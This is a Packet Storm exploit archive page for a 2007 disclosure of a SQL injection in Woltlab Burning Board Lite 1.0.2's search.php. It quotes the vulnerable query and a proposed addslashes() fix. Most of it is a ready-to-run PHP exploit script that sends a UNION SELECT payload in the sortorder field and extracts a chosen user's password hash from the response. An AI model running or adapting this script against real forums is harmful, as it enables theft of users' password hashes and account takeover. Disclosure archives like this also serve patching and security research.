what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

wbb-sql.txt

wbb-sql.txt
Posted Dec 20, 2007
Authored by NBBN

Woltlab Burning Board Lite version 1.0.2 suffers from a SQL injection vulnerability.

tags | exploit, sql injection
SHA-256 | e32edcf7a7d0b1b0b5d5b989953329c8fae41aeb1be644c989b56e18e09f0908

wbb-sql.txt

Change Mirror Download
In Woltlab Burning Board Lite(1.0.2) is a SQL-Injection Vulnerability in file: 
search.php :
Line: 510-515

if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");
$result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE
postids='$savepostids' AND showposts='$_POST[showposts]' AND
sortby='$_POST[sortby]' AND sortorder='$_POST[sortorder]' AND
userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'");
if($result['searchid']) {
header("Location:
search.php?searchid=$result[searchid]&sid=$session[hash]");
exit();
}

There no addslashes() in $_POST[showposts], $_POST[sortby].
$_POST[sortorder].


== Exploit ==
<?php
$host = $argv[1];
$path = $argv[2];
$searchstring = $argv[3];
$userid = $argv[4];
If ($argc <= 4)
{
echo "Usage: filename.php [host] [path] [searchstring] [user-id] \n Examples:
\n php filename.php localhost /wbblite/search.php Computer 1\n php
filename.php localhost /search.php Board 1\n";
die;
}
$sqlinjecting
= "searchstring=$searchstring&searchuser=&name_exactly=1&boardids%5B%5D=*&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost&sortorder=%27%20UNION%20SELECT%20password%20FROM%20bb1_users%20WHERE%20userid=$userid%20/*&send=send&sid=&submit=Suchen";
$con = fsockopen($host, 80);
echo("==Woltlab Burning Board LITE SQL-Injection Exploit founded and coded
by NBBN. \n\n\n");
sleep(1);
fputs($con, "POST $path HTTP/1.1\n");
fputs($con, "Host: $host\n");
fputs($con, "Content-type: application/x-www-form-urlencoded\n");
fputs($con, "Content-length: ". strlen($sqlinjecting) ."\n");
fputs($con, "Connection: close\n\n");
fputs($con, "$sqlinjecting\n");

while(!feof($con)) {
$res .= fgets($con, 128);
}
echo("Well done...\n");
fclose($con);

echo $res;
echo "The password-hash is in search.php?searchid=[Hash]\n";
$the_hash = substr($res,strpos($res,'searchid=')+9,32);
echo "Hash: $the_hash\n\n";
?>


== Fix ==

if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");
$result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE
postids='$savepostids' AND showposts='.addslashes($_POST[showposts]).' AND
sortby='.addslashes($_POST[sortby]).' AND
sortorder='.addslashes($_POST[sortorder]).' AND userid='$wbbuserdata[userid]'
AND ipaddress='$REMOTE_ADDR'");
if($result['searchid']) {
header("Location:
search.php?searchid=$result[searchid]&sid=$session[hash]");
exit();
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close